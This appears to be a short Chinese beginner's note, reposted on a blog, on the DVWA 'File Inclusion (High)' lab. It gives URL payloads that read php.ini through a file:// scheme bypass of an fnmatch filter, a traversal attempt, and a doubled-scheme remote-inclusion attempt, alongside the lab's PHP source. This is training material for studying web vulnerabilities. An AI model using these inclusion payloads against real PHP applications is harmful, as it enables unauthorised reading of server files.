搜索
6.File Inclusion(High)——小白笔记——文件包含漏洞
统计
  • 建站日期:2015-11-11
  • 文章总数:1185 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:4月28日

6.File Inclusion(High)——小白笔记——文件包含漏洞

纸飞机-JAVA追梦 / / 0 评论 / 59 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

1.本地

1.?page=..././..././..././dvwa/php.ini            //被过滤
2.使用file协议绕过fnmatch函数:?page=file:///var/www/html/dvwa/php.ini        //绕过    //必须allow_url_fopen和allow_url_include置为on

2.远程

2.?page=hthttp://tp://127.0.0.1/fit/f1.txt            //被过滤

2.上源码: File Inclusion Source

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?> 

fnmatch()匹配函数过滤了什么?
1.必须以file开头,否则就显示 ERROR: File not found!
2.等于include.php,否则就显示 ERROR: File not found!

3.Windows举例:
c:/program files/xxx————>file:///c:/program files/xxx
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/103015346
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

随机推荐

一个完整的内网渗透是什么样子的

《C游记》 番外篇(壹)二分查找显神威 猜数游戏趣味生

Struts2/S2-009

C# 使用foreach嵌套进行一个简单的遍历循环目录操作

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言